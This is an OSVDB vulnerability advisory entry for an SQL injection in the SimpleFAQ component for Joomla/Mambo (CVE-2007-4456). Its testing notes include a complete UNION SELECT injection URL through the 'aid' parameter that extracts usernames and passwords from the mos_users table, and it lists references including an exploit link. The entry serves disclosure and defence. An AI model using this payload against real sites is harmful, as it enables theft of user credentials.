SimpleFAQ Component for Joomla! index.php aid Variable SQL Injection

2007-08-20T00:00:00
ID OSVDB:37174
Type osvdb
Reporter OSVDB
Modified 2007-08-20T00:00:00

Description

Manual Testing Notes

http://[target]/mambo/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1//union//select//0,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0//from/*/mos_users/

References:

Vendor URL: http://www.parkviewconsultants.com/content/view/19/47/
Secunia Advisory ID:26556
Mail List Post: http://www.securityfocus.com/archive/1/archive/1/477232/100/0/threaded
ISS X-Force ID: 36113
Generic Exploit URL: http://www.milw0rm.com/exploits/4296
CVE-2007-4456